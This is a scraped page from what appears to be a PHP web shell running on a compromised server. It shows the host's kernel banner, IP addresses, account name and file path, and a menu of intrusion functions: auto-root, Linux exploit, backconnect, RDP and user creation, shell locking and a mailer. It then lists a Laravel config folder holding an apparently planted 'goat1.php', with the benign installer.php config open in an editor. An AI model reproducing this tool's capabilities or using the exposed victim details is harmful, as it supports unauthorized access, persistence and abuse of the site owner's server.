Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo18.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
app.php
4.58
KB
-rw-rw-r--
auth.php
4.03
KB
-rw-rw-r--
broadcasting.php
502
B
-rw-rw-r--
cache.php
3.34
KB
-rw-rw-r--
database.php
5.95
KB
-rw-rw-r--
debugbar.php
17.64
KB
-rw-rw-r--
default_currency.php
16.68
KB
-rw-rw-r--
email-providers.php
4.75
KB
-rw-rw-r--
error_log
2.74
KB
-rw-r--r--
filesystems.php
2.86
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
installer.php
2.15
KB
-rw-rw-r--
larabug.php
4.63
KB
-rw-rw-r--
logging.php
4.22
KB
-rw-rw-r--
mail.php
3.41
KB
-rw-rw-r--
media-library.php
6.04
KB
-rw-rw-r--
permission.php
6.89
KB
-rw-rw-r--
queue.php
3.73
KB
-rw-rw-r--
sanctum.php
2.97
KB
-rw-rw-r--
services.php
1.01
KB
-rw-rw-r--
session.php
7.66
KB
-rw-rw-r--
verification.php
79
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : installer.php
<?php return [ /* |-------------------------------------------------------------------------- | Server Requirements |-------------------------------------------------------------------------- | | This is the default Laravel server requirements, you can add as many | as your application needs. | */ 'core' => [ 'minPhpVersion' => '8.2.0', ], 'requirements' => [ 'php' => [ 'openssl', 'pdo', 'mbstring', 'tokenizer', 'xml', 'ctype', 'json', 'curl', 'zip', ], 'apache' => [ 'mod_rewrite', ], ], /* |-------------------------------------------------------------------------- | Folders Permissions |-------------------------------------------------------------------------- | | This is the default Laravel folders permissions, if your application | requires more permissions just add them to the list below. | */ 'permissions' => [ 'storage/app/' => '755', 'storage/framework/' => '755', 'storage/logs/' => '755', 'bootstrap/cache/' => '755', ], /* |-------------------------------------------------------------------------- | Environment Form Wizard Validation Rules & Messages |-------------------------------------------------------------------------- | | This are the default form field validation rules. Available Rules: | https://laravel.com/docs/validation#available-validation-rules | */ 'environment' => [ 'form' => [ 'rules' => [ 'app_name' => 'required|string|max:50', 'app_url' => 'required|url', 'database_connection' => 'required|string|max:50', 'database_hostname' => 'required|string|max:50', 'database_port' => 'required|numeric', 'database_name' => 'required|string|max:50', 'database_username' => 'required|string|max:50', 'database_password' => 'nullable|string|max:50', ], ], ], ];
Close